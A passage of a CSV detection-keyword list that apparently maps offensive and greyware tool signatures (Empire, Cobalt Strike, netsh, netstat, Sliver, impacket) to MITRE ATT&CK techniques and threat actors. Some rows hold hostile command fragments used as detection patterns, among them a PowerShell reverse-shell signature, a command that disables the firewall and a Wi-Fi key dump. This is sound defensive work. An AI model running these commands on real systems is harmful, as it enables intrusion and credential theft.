account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*netpass_x64.exe*","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*netpass-x64.zip*","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*netscan.exe /*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*netscan_setup.exe*","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Network Exploitation tools","https://www.softperfect.com/products/networkscanner/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*NetSh Advfirewall set allprofiles state off*","greyware_tool_keyword","netsh","Disable Windows Firewall","T1562.004 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*netsh interface portproxy add v4tov4 listenport=* connectport=* connectaddress=*","greyware_tool_keyword","netsh","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*netsh interface portproxy add v4tov4*listenaddress=* listenport=*connectaddress=*connectport*","greyware_tool_keyword","netsh","The actor has used the following commands to enable port forwarding [T1090] on the host","T1090.003 - T1123","TA0005 - TA0002","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*netsh interface portproxy delete v4tov4 listenport=*","greyware_tool_keyword","netsh","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*netsh interface portproxy show v4tov4*","greyware_tool_keyword","netsh","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*netsh wlan show profile $wlan key=clear | Select-String *?<=Key Content\s+:\s*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*netsh.exe add helper *\temp\*.dll*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","0","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*netshrun.dll*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*netsniff-ng*","offensive_tool_keyword","netsniff-ng","netsniff-ng is a high performance Linux network sniffer for packet inspection. It can be used for protocol analysis. reverse engineering or network debugging. The gain of performance is reached by 'zero-copy' mechanisms. so that the kernel does not need to copy packets from kernelspace to userspace.","T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://packages.debian.org/fr/sid/netsniff-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*netstat -ano*","greyware_tool_keyword","netstat","Adversaries may attempt to execute recon commands","T1046 - T1069","TA0002 - TA0003","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*netstat -ant*","greyware_tool_keyword","netstat","View all active TCP connections and the TCP and UDP ports the host is listening on.","T1046 - T1069","TA0002 - TA0003","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*netstat -tnlp || ss -tnlp*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*netstat -unlp || ss -unlp*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*NETSTAT.EXE* -ano*","greyware_tool_keyword","netstat","Adversaries may attempt to execute recon commands","T1046 - T1069","TA0002 - TA0003","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*nettitude/ETWHash*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" +"*nettitude/MalSCCM*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" +"*netuser_enum*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*netview.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*netview_enum*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*network2john.lua*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*NetworkMiner*","offensive_tool_keyword","NetworkMiner","A Network Forensic Analysis Tool (NFAT)","T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","http://www.netresec.com/?page=NetworkMiner","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*new session to 127.0.0.1:3000*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" +"*NewAdminAccountCreation.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*New-ElevatedPersistenceOption*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-ElevatedPersistenceOption*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*New-HoneyHash*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","New-HoneyHash.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-HoneyHash.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1086","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-InMemoryModule -ModuleName Win32*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-InMemoryModule*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-InMemoryModule*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-MailBoxExportRequest -Mailbox *@* -FilePath *.aspx*","offensive_tool_keyword","ProxyShell","Microsoft Exchange Servers exploits - ProxyLogon and ProxyShell CVE-2021-27065 CVE-2021-34473 CVE-2021-34523 CVE-2021-31207","T1210.003 - T1190 - T1059.003 - T1059.001 - T1059.005 - T1505","TA0001 - TA0002 - TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation Tools","https://www.cert.ssi.gouv.fr/uploads/ANSSI_TLPWHITE_ProxyShell_ProxyLogon_Sigma_yml.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*New-Object System.Net.Sockets.TCPClient(*$stream = $client.GetStream()*[byte[]]$bytes = 0..65535*","greyware_tool_keyword","powershell","Powershell reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*new-operator --name * --lhost *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*New-PSAmsiScanner -*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*New-PSDrive -Name T -PSProvider FileSystem -Root \\$IP\transfer *","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*New-RoutingPacket*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1057","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-UserPersistenceOption*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 